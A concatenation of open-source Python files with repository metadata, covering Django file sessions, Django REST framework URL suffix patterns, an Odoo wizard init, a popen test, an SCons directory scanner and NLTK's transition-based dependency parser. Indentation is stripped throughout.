dir, prefix = os.path.split(session_file_name)
try:
output_file_fd, output_file_name = tempfile.mkstemp(dir=dir,
prefix=prefix + '_out_')
renamed = False
try:
try:
os.write(output_file_fd, self.encode(session_data).encode())
finally:
os.close(output_file_fd)
# This will atomically rename the file (os.rename) if the OS
# supports it. Otherwise this will result in a shutil.copy2
# and os.unlink (for example on Windows). See #9084.
shutil.move(output_file_name, session_file_name)
renamed = True
finally:
if not renamed:
os.unlink(output_file_name)
except (OSError, IOError, EOFError):
pass
def exists(self, session_key):
return os.path.exists(self._key_to_file(session_key))
def delete(self, session_key=None):
if session_key is None:
if self.session_key is None:
return
session_key = self.session_key
try:
os.unlink(self._key_to_file(session_key))
except OSError:
pass
def clean(self):
pass
@classmethod
def clear_expired(cls):
storage_path = cls._get_storage_path()
file_prefix = settings.SESSION_COOKIE_NAME
for session_file in os.listdir(storage_path):
if not session_file.startswith(file_prefix):
continue
session_key = session_file[len(file_prefix):]
session = cls(session_key)
# When an expired session is loaded, its file is removed, and a
# new file is immediately created. Prevent this by disabling
# the create() method.
session.create = lambda: None
session.load()
|
bsd-3-clause
|
ClovisIRex/Snake-django
|
env/lib/python3.6/site-packages/rest_framework/urlpatterns.py
|
18
|
2407
|
from __future__ import unicode_literals
from django.conf.urls import url
from rest_framework.compat import RegexURLResolver, include
from rest_framework.settings import api_settings
def apply_suffix_patterns(urlpatterns, suffix_pattern, suffix_required):
ret = []
for urlpattern in urlpatterns:
if isinstance(urlpattern, RegexURLResolver):
# Set of included URL patterns
regex = urlpattern.regex.pattern
namespace = urlpattern.namespace
app_name = urlpattern.app_name
kwargs = urlpattern.default_kwargs
# Add in the included patterns, after applying the suffixes
patterns = apply_suffix_patterns(urlpattern.url_patterns,
suffix_pattern,
suffix_required)
ret.append(url(regex, include(patterns, namespace, app_name), kwargs))
else:
# Regular URL pattern
regex = urlpattern.regex.pattern.rstrip('$').rstrip('/') + suffix_pattern
view = urlpattern.callback
kwargs = urlpattern.default_args
name = urlpattern.name
# Add in both the existing and the new urlpattern
if not suffix_required:
ret.append(urlpattern)
ret.append(url(regex, view, kwargs, name))
return ret
def format_suffix_patterns(urlpatterns, suffix_required=False, allowed=None):
"""
Supplement existing urlpatterns with corresponding patterns that also
include a '.format' suffix. Retains urlpattern ordering.
urlpatterns:
A list of URL patterns.
suffix_required:
If `True`, only suffixed URLs will be generated, and non-suffixed
URLs will not be used. Defaults to `False`.
allowed:
An optional tuple/list of allowed suffixes. eg ['json', 'api']
Defaults to `None`, which allows any suffix.
"""
suffix_kwarg = api_settings.FORMAT_SUFFIX_KWARG
if allowed:
if len(allowed) == 1:
allowed_pattern = allowed[0]
else:
allowed_pattern = '(%s)' % '|'.join(allowed)
suffix_pattern = r'\.(?P<%s>%s)/?$' % (suffix_kwarg, allowed_pattern)
else:
suffix_pattern = r'\.(?P<%s>[a-z0-9]+)/?$' % suffix_kwarg
return apply_suffix_patterns(urlpatterns, suffix_pattern, suffix_required)
|
mit
|
exploreodoo/datStruct
|
odoo/addons/stock/wizard/__init__.py
|
323
|
1149
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import stock_move
import stock_return_picking
import stock_change_product_qty
import make_procurement_product
import orderpoint_procurement
import stock_transfer_details
|
gpl-2.0
|
loongson-community/EFI-MIPS
|
ToolKit/cmds/python/Lib/test/skipped/test_popen.py
|
24
|
1397
|
#! /usr/bin/env python
"""Basic tests for os.popen()
Particularly useful for platforms that fake popen.
"""
import os
import sys
from test.test_support import TestSkipped
from os import popen
# Test that command-lines get down as we expect.
# To do this we execute:
# python -c "import sys;print sys.argv" {rest_of_commandline}
# This results in Python being spawned and printing the sys.argv list.
# We can then eval() the result of this, and see what each argv was.
python = sys.executable
if ' ' in python:
python = '"' + python + '"' # quote embedded space for cmdline
def _do_test_commandline(cmdline, expected):
cmd = '%s -c "import sys;print sys.argv" %s' % (python, cmdline)
data = popen(cmd).read()
got = eval(data)[1:] # strip off argv[0]
if got != expected:
print "Error in popen commandline handling."
print " executed '%s', expected '%r', but got '%r'" \
% (cmdline, expected, got)
def _test_commandline():
_do_test_commandline("foo bar", ["foo", "bar"])
_do_test_commandline('foo "spam and eggs" "silly walk"', ["foo", "spam and eggs", "silly walk"])
_do_test_commandline('foo "a \\"quoted\\" arg" bar', ["foo", 'a "quoted" arg', "bar"])
print "popen seemed to process the command-line correctly"
def main():
print "Test popen:"
_test_commandline()
main()
|
bsd-3-clause
|
bubichain/blockchain
|
src/3rd/src/jsoncpp/scons-2.1.0/engine/SCons/Scanner/Dir.py
|
21
|
3810
|
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
__revision__ = "src/engine/SCons/Scanner/Dir.py 5357 2011/09/09 21:31:03 bdeegan"
import SCons.Node.FS
import SCons.Scanner
def only_dirs(nodes):
is_Dir = lambda n: isinstance(n.disambiguate(), SCons.Node.FS.Dir)
return list(filter(is_Dir, nodes))
def DirScanner(**kw):
"""Return a prototype Scanner instance for scanning
directories for on-disk files"""
kw['node_factory'] = SCons.Node.FS.Entry
kw['recursive'] = only_dirs
return SCons.Scanner.Base(scan_on_disk, "DirScanner", **kw)
def DirEntryScanner(**kw):
"""Return a prototype Scanner instance for "scanning"
directory Nodes for their in-memory entries"""
kw['node_factory'] = SCons.Node.FS.Entry
kw['recursive'] = None
return SCons.Scanner.Base(scan_in_memory, "DirEntryScanner", **kw)
skip_entry = {}
skip_entry_list = [
'.',
'..',
'.sconsign',
# Used by the native dblite.py module.
'.sconsign.dblite',
# Used by dbm and dumbdbm.
'.sconsign.dir',
# Used by dbm.
'.sconsign.pag',
# Used by dumbdbm.
'.sconsign.dat',
'.sconsign.bak',
# Used by some dbm emulations using Berkeley DB.
'.sconsign.db',
]
for skip in skip_entry_list:
skip_entry[skip] = 1
skip_entry[SCons.Node.FS._my_normcase(skip)] = 1
do_not_scan = lambda k: k not in skip_entry
def scan_on_disk(node, env, path=()):
"""
Scans a directory for on-disk files and directories therein.
Looking up the entries will add these to the in-memory Node tree
representation of the file system, so all we have to do is just
that and then call the in-memory scanning function.
"""
try:
flist = node.fs.listdir(node.abspath)
except (IOError, OSError):
return []
e = node.Entry
for f in filter(do_not_scan, flist):
# Add ./ to the beginning of the file name so if it begins with a
# '#' we don't look it up relative to the top-level directory.
e('./' + f)
return scan_in_memory(node, env, path)
def scan_in_memory(node, env, path=()):
"""
"Scans" a Node.FS.Dir for its in-memory entries.
"""
try:
entries = node.entries
except AttributeError:
# It's not a Node.FS.Dir (or doesn't look enough like one for
# our purposes), which can happen if a target list containing
# mixed Node types (Dirs and Files, for example) has a Dir as
# the first entry.
return []
entry_list = sorted(filter(do_not_scan, list(entries.keys())))
return [entries[n] for n in entry_list]
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
apache-2.0
|
zimmermegan/smarda
|
nltk-3.0.3/nltk/parse/transitionparser.py
|
5
|
31354
|
# Natural Language Toolkit: Arc-Standard and Arc-eager Transition Based Parsers
#
# Author: Long Duong <[email protected]>
#
# Copyright (C) 2001-2015 NLTK Project
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tempfile
import pickle
from os import remove
from copy import deepcopy
from operator import itemgetter
try:
from numpy import array
from scipy import sparse
from sklearn.datasets import load_svmlight_file
from sklearn import svm
except ImportError:
pass
from nltk.parse import ParserI, DependencyGraph, DependencyEvaluator
class Configuration(object):
"""
Class for holding configuration which is the partial analysis of the input sentence.
The transition based parser aims at finding set of operators that transfer the initial
configuration to the terminal configuration.
The configuration includes:
- Stack: for storing partially proceeded words
- Buffer: for storing remaining input words
- Set of arcs: for storing partially built dependency tree
This class also provides a method to represent a configuration as list of features.
"""
def __init__(self, dep_graph):
"""
:param dep_graph: the representation of an input in the form of dependency graph.
:type dep_graph: DependencyGraph where the dependencies are not specified.
"""
# dep_graph.nodes contain list of token for a sentence
self.stack = [0] # The root element
self.buffer = list(range(1, len(dep_graph.nodes))) # The rest is in the buffer
self.arcs = [] # empty set of arc
self._tokens = dep_graph.nodes
self._max_address = len(self.buffer)
def __str__(self):
return 'Stack : ' + \
str(self.stack) + ' Buffer : ' + str(self.buffer) + ' Arcs : ' + str(self.arcs)
def _check_informative(self, feat, flag=False):
"""
Check whether a feature is informative
The flag control whether "_" is informative or not
"""
if feat is None:
return False
if feat == '':
return False
if flag is False:
if feat == '_':
return False
return True
def extract_features(self):
"""
Extract the set of features for the current configuration. Implement standard features as describe in
Table 3.2 (page 31) in Dependency Parsing book by Sandra Kubler, Ryan McDonal, Joakim Nivre.
Please note that these features are very basic.
:return: list(str)
"""
result = []
# Todo : can come up with more complicated features set for better
# performance.
if len(self.stack) > 0:
# Stack 0
stack_idx0 = self.stack[len(self.stack) - 1]
token = self._tokens[stack_idx0]
if self._check_informative(token['word'], True):
result.append('STK_0_FORM_' + token['word'])
if 'lemma' in token and self._check_informative(token['lemma']):
result.append('STK_0_LEMMA_' + token['lemma'])
if self._check_informative(token['tag']):
result.append('STK_0_POS_' + token['tag'])
if 'feats' in token and self._check_informative(token['feats']):
feats = token['feats'].split("|")
for feat in feats:
result.append('STK_0_FEATS_' + feat)
# Stack 1
if len(self.stack) > 1:
stack_idx1 = self.stack[len(self.stack) - 2]
token = self._tokens[stack_idx1]
if self._check_informative(token['tag']):
result.append('STK_1_POS_' + token['tag'])
# Left most, right most dependency of stack[0]
left_most = 1000000
right_most = -1
dep_left_most = ''
dep_right_most = ''
for (wi, r, wj) in self.arcs:
if wi == stack_idx0:
if (wj > wi) and (wj > right_most):
right_most = wj
dep_right_most = r
if (wj < wi) and (wj < left_most):
left_most = wj
dep_left_most = r
if self._check_informative(dep_left_most):
result.append('STK_0_LDEP_' + dep_left_most)
if self._check_informative(dep_right_most):
result.append('STK_0_RDEP_' + dep_right_most)
# Check Buffered 0
if len(self.buffer) > 0:
# Buffer 0
buffer_idx0 = self.buffer[0]
token = self._tokens[buffer_idx0]
if self._check_informative(token['word'], True):
result.append('BUF_0_FORM_' + token['word'])
if 'lemma' in token and self._check_informative(token['lemma']):
result.append('BUF_0_LEMMA_' + token['lemma'])
if self._check_informative(token['tag']):
result.append('BUF_0_POS_' + token['tag'])
if 'feats' in token and self._check_informative(token['feats']):
feats = token['feats'].split("|")
for feat in feats:
result.append('BUF_0_FEATS_' + feat)
# Buffer 1
if len(self.buffer) > 1:
buffer_idx1 = self.buffer[1]
token = self._tokens[buffer_idx1]
if self._check_informative(token['word'], True):
result.append('BUF_1_FORM_' + token['word'])
if self._check_informative(token['tag']):
result.append('BUF_1_POS_' + token['tag'])
if len(self.buffer) > 2:
buffer_idx2 = self.buffer[2]
token = self._tokens[buffer_idx2]
if self._check_informative(token['tag']):
result.append('BUF_2_POS_' + token['tag'])
if len(self.buffer) > 3:
buffer_idx3 = self.buffer[3]
token = self._tokens[buffer_idx3]
if self._check_informative(token['tag']):
result.append('BUF_3_POS_' + token['tag'])
# Left most, right most dependency of stack[0]
left_most = 1000000
right_most = -1
dep_left_most = ''
dep_right_most = ''
for (wi, r, wj) in self.arcs:
if wi == buffer_idx0:
if (wj > wi) and (wj > right_most):
right_most = wj
dep_right_most = r
if (wj < wi) and (wj < left_most):
left_most = wj
dep_left_most = r
if self._check_informative(dep_left_most):
result.append('BUF_0_LDEP_' + dep_left_most)
if self._check_informative(dep_right_most):
result.append('BUF_0_RDEP_' + dep_right_most)
return result
class Transition(object):
"""
This class defines a set of transition which is applied to a configuration to get another configuration
Note that for different parsing algorithm, the transition is different.
"""
# Define set of transitions
LEFT_ARC = 'LEFTARC'
RIGHT_ARC = 'RIGHTARC'
SHIFT = 'SHIFT'
REDUCE = 'REDUCE'
def __init__(self, alg_option):
"""
:param alg_option: the algorithm option of this parser. Currently support `arc-standard` and `arc-eager` algorithm
:type alg_option: str
"""
self._algo = alg_option
if alg_option not in [
TransitionParser.ARC_STANDARD,
TransitionParser.ARC_EAGER]:
raise ValueError(" Currently we only support %s and %s " %
(TransitionParser.ARC_STANDARD, TransitionParser.ARC_EAGER))
def left_arc(self, conf, relation):
"""
Note that the algorithm for left-arc is quite similar except for precondition for both arc-standard and arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if (len(conf.buffer) <= 0) or (len(conf.stack) <= 0):
return -1
if conf.buffer[0] == 0:
# here is the Root element
return -1
idx_wi = conf.stack[len(conf.stack) - 1]
flag = True
if self._algo == TransitionParser.ARC_EAGER:
for (idx_parent, r, idx_child) in conf.arcs:
if idx_child == idx_wi:
flag = False
if flag:
conf.stack.pop()
idx_wj = conf.buffer[0]
conf.arcs.append((idx_wj, relation, idx_wi))
else:
return -1
def right_arc(self, conf, relation):
"""
Note that the algorithm for right-arc is DIFFERENT for arc-standard and arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if (len(conf.buffer) <= 0) or (len(conf.stack) <= 0):
return -1
if self._algo == TransitionParser.ARC_STANDARD:
idx_wi = conf.stack.pop()
idx_wj = conf.buffer[0]
conf.buffer[0] = idx_wi
conf.arcs.append((idx_wi, relation, idx_wj))
else: # arc-eager
idx_wi = conf.stack[len(conf.stack) - 1]
idx_wj = conf.buffer.pop(0)
conf.stack.append(idx_wj)
conf.arcs.append((idx_wi, relation, idx_wj))
def reduce(self, conf):
"""
Note that the algorithm for reduce is only available for arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if self._algo != TransitionParser.ARC_EAGER:
return -1
if len(conf.stack) <= 0:
return -1
idx_wi = conf.stack[len(conf.stack) - 1]
flag = False
for (idx_parent, r, idx_child) in conf.arcs:
if idx_child == idx_wi:
flag = True
if flag:
conf.stack.pop() # reduce it
else:
return -1
def shift(self, conf):
"""
Note that the algorithm for shift is the SAME for arc-standard and arc-eager
:param configuration: is the current configuration
:return : A new configuration or -1 if the pre-condition is not satisfied
"""
if len(conf.buffer) <= 0:
return -1
idx_wi = conf.buffer.pop(0)
conf.stack.append(idx_wi)
class TransitionParser(ParserI):
"""
Class for transition based parser. Implement 2 algorithms which are "arc-standard" and "arc-eager"
"""
ARC_STANDARD = 'arc-standard'
ARC_EAGER = 'arc-eager'
def __init__(self, algorithm):
"""
:param algorithm: the algorithm option of this parser. Currently support `arc-standard` and `arc-eager` algorithm
:type algorithm: str
"""
if not(algorithm in [self.ARC_STANDARD, self.ARC_EAGER]):
raise ValueError(" Currently we only support %s and %s " %
(self.ARC_STANDARD, self.ARC_EAGER))
self._algorithm = algorithm
self._dictionary = {}
self._transition = {}
self._match_transition = {}
def _get_dep_relation(self, idx_parent, idx_child, depgraph):
p_node = depgraph.nodes[idx_parent]
c_node = depgraph.nodes[idx_child]
if c_node['word'] is None:
return None # Root word
if c_node['head'] == p_node['address']:
return c_node['rel']
else:
return None
def _convert_to_binary_features(self, features):
"""
:param features: list of feature string which is needed to convert to binary features
:type features: list(str)
:return : string of binary features in libsvm format which is 'featureID:value' pairs
"""
unsorted_result = []
for feature in features:
self._dictionary.setdefault(feature, len(self._dictionary))
unsorted_result.append(self._dictionary[feature])
# Default value of each feature is 1.0
return ' '.join(str(featureID) + ':1.0' for featureID in sorted(unsorted_result))
def _is_projective(self, depgraph):
arc_list = []
for key in depgraph.nodes:
node = depgraph.nodes[key]
if 'head' in node:
childIdx = node['address']
parentIdx = node['head']
if parentIdx is not None:
arc_list.append((parentIdx, childIdx))
for (parentIdx, childIdx) in arc_list:
# Ensure that childIdx < parentIdx
if childIdx > parentIdx:
temp = childIdx
childIdx = parentIdx
parentIdx = temp
for k in range(childIdx + 1, parentIdx):
for m in range(len(depgraph.nodes)):
if (m < childIdx) or (m > parentIdx):
if (k, m) in arc_list:
return False
if (m, k) in arc_list:
return False
return True
def _write_to_file(self, key, binary_features, input_file):
"""
write the binary features to input file and update the transition dictionary
"""
self._transition.setdefault(key, len(self._transition) + 1)
self._match_transition[self._transition[key]] = key
input_str = str(self._transition[key]) + ' ' + binary_features + '\n'
input_file.write(input_str.encode('utf-8'))
def _create_training_examples_arc_std(self, depgraphs, input_file):
"""
Create the training example in the libsvm format and write it to the input_file.
Reference : Page 32, Chapter 3. Dependency Parsing by Sandra Kubler, Ryan McDonal and Joakim Nivre (2009)
"""
operation = Transition(self.ARC_STANDARD)
count_proj = 0
training_seq = []
for depgraph in depgraphs:
if not self._is_projective(depgraph):
continue
count_proj += 1
conf = Configuration(depgraph)
while len(conf.buffer) > 0:
b0 = conf.buffer[0]
features = conf.extract_features()
binary_features = self._convert_to_binary_features(features)
if len(conf.stack) > 0:
s0 = conf.stack[len(conf.stack) - 1]
# Left-arc operation
rel = self._get_dep_relation(b0, s0, depgraph)
if rel is not None:
key = Transition.LEFT_ARC + ':' + rel
self._write_to_file(key, binary_features, input_file)
operation.left_arc(conf, rel)
training_seq.append(key)
continue
# Right-arc operation
rel = self._get_dep_relation(s0, b0, depgraph)
if rel is not None:
precondition = True
# Get the max-index of buffer
maxID = conf._max_address
for w in range(maxID + 1):
if w != b0:
relw = self._get_dep_relation(b0, w, depgraph)
if relw is not None:
if (b0, relw, w) not in conf.arcs:
precondition = False
if precondition:
key = Transition.RIGHT_ARC + ':' + rel
self._write_to_file(
key,
binary_features,
input_file)
operation.right_arc(conf, rel)
training_seq.append(key)
continue
# Shift operation as the default
key = Transition.SHIFT
self._write_to_file(key, binary_features, input_file)
operation.shift(conf)
training_seq.append(key)
print(" Number of training examples : " + str(len(depgraphs)))
print(" Number of valid (projective) examples : " + str(count_proj))
return training_seq
def _create_training_examples_arc_eager(self, depgraphs, input_file):
"""
Create the training example in the libsvm format and write it to the input_file.
Reference : 'A Dynamic Oracle for Arc-Eager Dependency Parsing' by Joav Goldberg and Joakim Nivre
"""
operation = Transition(self.ARC_EAGER)
countProj = 0
training_seq = []
for depgraph in depgraphs:
if not self._is_projective(depgraph):
continue
countProj += 1
conf = Configuration(depgraph)
while len(conf.buffer) > 0:
b0 = conf.buffer[0]
features = conf.extract_features()
binary_features = self._convert_to_binary_features(features)
if len(conf.stack) > 0:
s0 = conf.stack[len(conf.stack) - 1]
# Left-arc operation
rel = self._get_dep_relation(b0, s0, depgraph)
if rel is not None:
key = Transition.LEFT_ARC + ':' + rel
self._write_to_file(key, binary_features, input_file)
operation.left_arc(conf, rel)
training_seq.append(key)
continue
# Right-arc operation
rel = self._get_dep_relation(s0, b0, depgraph)
if rel is not None:
key = Transition.RIGHT_ARC + ':' + rel
self._write_to_file(key, binary_features, input_file)
operation.right_arc(conf, rel)
training_seq.append(key)
continue
# reduce operation
flag = False
for k in range(s0):
if self._get_dep_relation(k, b0, depgraph) is not None:
flag = True
if self._get_dep_relation(b0, k, depgraph) is not None:
flag = True
if flag:
key = Transition.REDUCE
self._write_to_file(key, binary_features, input_file)
operation.reduce(conf)
training_seq.append(key)
continue
# Shift operation as the default
key = Transition.SHIFT
self._write_to_file(key, binary_features, input_file)
operation.shift(conf)
training_seq.append(key)
print(" Number of training examples : " + str(len(depgraphs)))
print(" Number of valid (projective) examples : " + str(countProj))
return training_seq
def train(self, depgraphs, modelfile):
"""
:param depgraphs : list of DependencyGraph as the training data
:type depgraphs : DependencyGraph
:param modelfile : file name to save the trained model
:type modelfile : str
"""
try:
input_file = tempfile.NamedTemporaryFile(
prefix='transition_parse.train',
dir=tempfile.gettempdir(),
delete=False)
if self._algorithm == self.ARC_STANDARD:
self._create_training_examples_arc_std(depgraphs, input_file)
else:
self._create_training_examples_arc_eager(depgraphs, input_file)
input_file.close()
# Using the temporary file to train the libsvm classifier
x_train, y_train = load_svmlight_file(input_file.name)
# The parameter is set according to the paper:
# Algorithms for Deterministic Incremental Dependency Parsing by Joakim Nivre
# Todo : because of probability = True => very slow due to
# cross-validation. Need to improve the speed here
model = svm.SVC(
kernel='poly',
degree=2,
coef0=0,
gamma=0.2,
C=0.5,
verbose=True,
probability=True)
model.fit(x_train, y_train)
# Save the model to file name (as pickle)
pickle.dump(model, open(modelfile, 'wb'))
finally:
remove(input_file.name)
def parse(self, depgraphs, modelFile):
"""
:param depgraphs: the list of test sentence, each sentence is represented as a dependency graph where the 'head' information is dummy
:type depgraphs: list(DependencyGraph)
:param modelfile: the model file
:type modelfile: str
:return: list (DependencyGraph) with the 'head' and 'rel' information
"""
result = []
# First load the model
model = pickle.load(open(modelFile, 'rb'))
operation = Transition(self._algorithm)
for depgraph in depgraphs:
conf = Configuration(depgraph)
while len(conf.buffer) > 0:
features = conf.extract_features()
col = []
row = []
data = []
for feature in features:
if feature in self._dictionary:
col.append(self._dictionary[feature])
row.append(0)
data.append(1.0)
np_col = array(sorted(col)) # NB : index must be sorted
np_row = array(row)
np_data = array(data)
x_test = sparse.csr_matrix((np_data, (np_row, np_col)), shape=(1, len(self._dictionary)))
# It's best to use decision function as follow BUT it's not supported yet for sparse SVM
# Using decision funcion to build the votes array
#dec_func = model.decision_function(x_test)[0]
#votes = {}
#k = 0
# for i in range(len(model.classes_)):
# for j in range(i+1, len(model.classes_)):
# #if dec_func[k] > 0:
# votes.setdefault(i,0)
# votes[i] +=1
# else:
# votes.setdefault(j,0)
# votes[j] +=1
# k +=1
# Sort votes according to the values
#sorted_votes = sorted(votes.items(), key=itemgetter(1), reverse=True)
# We will use predict_proba instead of decision_function
prob_dict = {}
pred_prob = model.predict_proba(x_test)[0]
for i in range(len(pred_prob)):
prob_dict[i] = pred_prob[i]
sorted_Prob = sorted(
prob_dict.items(),
key=itemgetter(1),
reverse=True)
# Note that SHIFT is always a valid operation
for (y_pred_idx, confidence) in sorted_Prob:
#y_pred = model.predict(x_test)[0]
# From the prediction match to the operation
y_pred = model.classes_[y_pred_idx]
if y_pred in self._match_transition:
strTransition = self._match_transition[y_pred]
baseTransition = strTransition.split(":")[0]
if baseTransition == Transition.LEFT_ARC:
if operation.left_arc(conf, strTransition.split(":")[1]) != -1:
break
elif baseTransition == Transition.RIGHT_ARC:
if operation.right_arc(conf, strTransition.split(":")[1]) != -1:
break
elif baseTransition == Transition.REDUCE:
if operation.reduce(conf) != -1:
break
elif baseTransition == Transition.SHIFT:
if operation.shift(conf) != -1:
break
else:
raise ValueError("The predicted transition is not recognized, expected errors")
# Finish with operations build the dependency graph from Conf.arcs
new_depgraph = deepcopy(depgraph)
for key in new_depgraph.nodes:
node = new_depgraph.nodes[key]
node['rel'] = ''
# With the default, all the token depend on the Root
node['head'] = 0
for (head, rel, child) in conf.arcs:
c_node = new_depgraph.nodes[child]
c_node['head'] = head
c_node['rel'] = rel
result.append(new_depgraph)
return result
def demo():
"""
>>> from nltk.parse import DependencyGraph, DependencyEvaluator
>>> from nltk.parse.transitionparser import TransitionParser, Configuration, Transition
>>> gold_sent = DependencyGraph(\"""
... Economic JJ 2 ATT
... news NN 3 SBJ
... has VBD 0 ROOT
... little JJ 5 ATT
... effect NN 3 OBJ
... on IN 5 ATT
... financial JJ 8 ATT
... markets NNS 6 PC
... . . 3 PU
... \""")
>>> conf = Configuration(gold_sent)
###################### Check the Initial Feature ########################
>>> print(', '.join(conf.extract_features()))
STK_0_POS_TOP, BUF_0_FORM_Economic, BUF_0_LEMMA_Economic, BUF_0_POS_JJ, BUF_1_FORM_news, BUF_1_POS_NN, BUF_2_POS_VBD, BUF_3_POS_JJ
###################### Check The Transition #######################
Check the Initialized Configuration
>>> print(conf)
Stack : [0] Buffer : [1, 2, 3, 4, 5, 6, 7, 8, 9] Arcs : []
A. Do some transition checks for ARC-STANDARD
>>> operation = Transition('arc-standard')
>>> operation.shift(conf)
>>> operation.left_arc(conf, "ATT")
>>> operation.shift(conf)
>>> operation.left_arc(conf,"SBJ")
>>> operation.shift(conf)
>>> operation.shift(conf)
>>> operation.left_arc(conf, "ATT")
>>> operation.shift(conf)
>>> operation.shift(conf)
>>> operation.shift(conf)
>>> operation.left_arc(conf, "ATT")
Middle Configuration and Features Check
>>> print(conf)
Stack : [0, 3, 5, 6] Buffer : [8, 9] Arcs : [(2, 'ATT', 1), (3, 'SBJ', 2), (5, 'ATT', 4), (8, 'ATT', 7)]
>>> print(', '.join(conf.extract_features()))
STK_0_FORM_on, STK_0_LEMMA_on, STK_0_POS_IN, STK_1_POS_NN, BUF_0_FORM_markets, BUF_0_LEMMA_markets, BUF_0_POS_NNS, BUF_1_FORM_., BUF_1_POS_., BUF_0_LDEP_ATT
>>> operation.right_arc(conf, "PC")
>>> operation.right_arc(conf, "ATT")
>>> operation.right_arc(conf, "OBJ")
>>> operation.shift(conf)
>>> operation.right_arc(conf, "PU")
>>> operation.right_arc(conf, "ROOT")
>>> operation.shift(conf)
Terminated Configuration Check
>>> print(conf)
Stack : [0] Buffer : [] Arcs : [(2, 'ATT', 1), (3, 'SBJ', 2), (5, 'ATT', 4), (8, 'ATT', 7), (6, 'PC', 8), (5, 'ATT', 6), (3, 'OBJ', 5), (3, 'PU', 9), (0, 'ROOT', 3)]
B. Do some transition checks for ARC-EAGER
>>> conf = Configuration(gold_sent)
>>> operation = Transition('arc-eager')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'ATT')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'SBJ')
>>> operation.right_arc(conf,'ROOT')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'ATT')
>>> operation.right_arc(conf,'OBJ')
>>> operation.right_arc(conf,'ATT')
>>> operation.shift(conf)
>>> operation.left_arc(conf,'ATT')
>>> operation.right_arc(conf,'PC')
>>> operation.reduce(conf)
>>> operation.reduce(conf)
>>> operation.reduce(conf)
>>> operation.right_arc(conf,'PU')
>>> print(conf)
Stack : [0, 3, 9] Buffer : [] Arcs : [(2, 'ATT', 1), (3, 'SBJ', 2), (0, 'ROOT', 3), (5, 'ATT', 4), (3, 'OBJ', 5), (5, 'ATT', 6), (8, 'ATT', 7), (6, 'PC', 8), (3, 'PU', 9)]
###################### Check The Training Function #######################
A. Check the ARC-STANDARD training
>>> import tempfile
>>> import os
>>> input_file = tempfile.NamedTemporaryFile(prefix='transition_parse.train', dir=tempfile.gettempdir(), delete=False)
>>> parser_std = TransitionParser('arc-standard')
>>> print(', '.join(parser_std._create_training_examples_arc_std([gold_sent], input_file)))
Number of training examples : 1
Number of valid (projective) examples : 1
SHIFT, LEFTARC:ATT, SHIFT, LEFTARC:SBJ, SHIFT, SHIFT, LEFTARC:ATT, SHIFT, SHIFT, SHIFT, LEFTARC:ATT, RIGHTARC:PC, RIGHTARC:ATT, RIGHTARC:OBJ, SHIFT, RIGHTARC:PU, RIGHTARC:ROOT, SHIFT
>>> parser_std.train([gold_sent],'temp.arcstd.model')
Number of training examples : 1
Number of valid (projective) examples : 1
...
>>> remove(input_file.name)
B. Check the ARC-EAGER training
>>> input_file = tempfile.NamedTemporaryFile(prefix='transition_parse.train', dir=tempfile.gettempdir(),delete=False)
>>> parser_eager = TransitionParser('arc-eager')
>>> print(', '.join(parser_eager._create_training_examples_arc_eager([gold_sent], input_file)))
Number of training examples : 1
Number of valid (projective) examples : 1
SHIFT, LEFTARC:ATT, SHIFT, LEFTARC:SBJ, RIGHTARC:ROOT, SHIFT, LEFTARC:ATT, RIGHTARC:OBJ, RIGHTARC:ATT, SHIFT, LEFTARC:ATT, RIGHTARC:PC, REDUCE, REDUCE, REDUCE, RIGHTARC:PU
>>> parser_eager.train([gold_sent],'temp.arceager.model')
Number of training examples : 1
Number of valid (projective) examples : 1
...
>>> remove(input_file.name)
###################### Check The Parsing Function ########################
A. Check the ARC-STANDARD parser
>>> result = parser_std.parse([gold_sent], 'temp.arcstd.model')
>>> de = DependencyEvaluator(result, [gold_sent])
>>> de.eval() >= (0, 0)
True
B. Check the ARC-EAGER parser
>>> result = parser_eager.parse([gold_sent], 'temp.arceager.model')
>>> de = DependencyEvaluator(result, [gold_sent])
>>> de.eval() >= (0, 0)
True
Note that result is very poor because of only one training example.
"""
if __name__ == '__main__':
import doctest
doctest.testmod(optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)
|
mit
|
zsjohny/jumpserver
|
apps/terminal/backends/command/models.py
|
1
|
1763
|
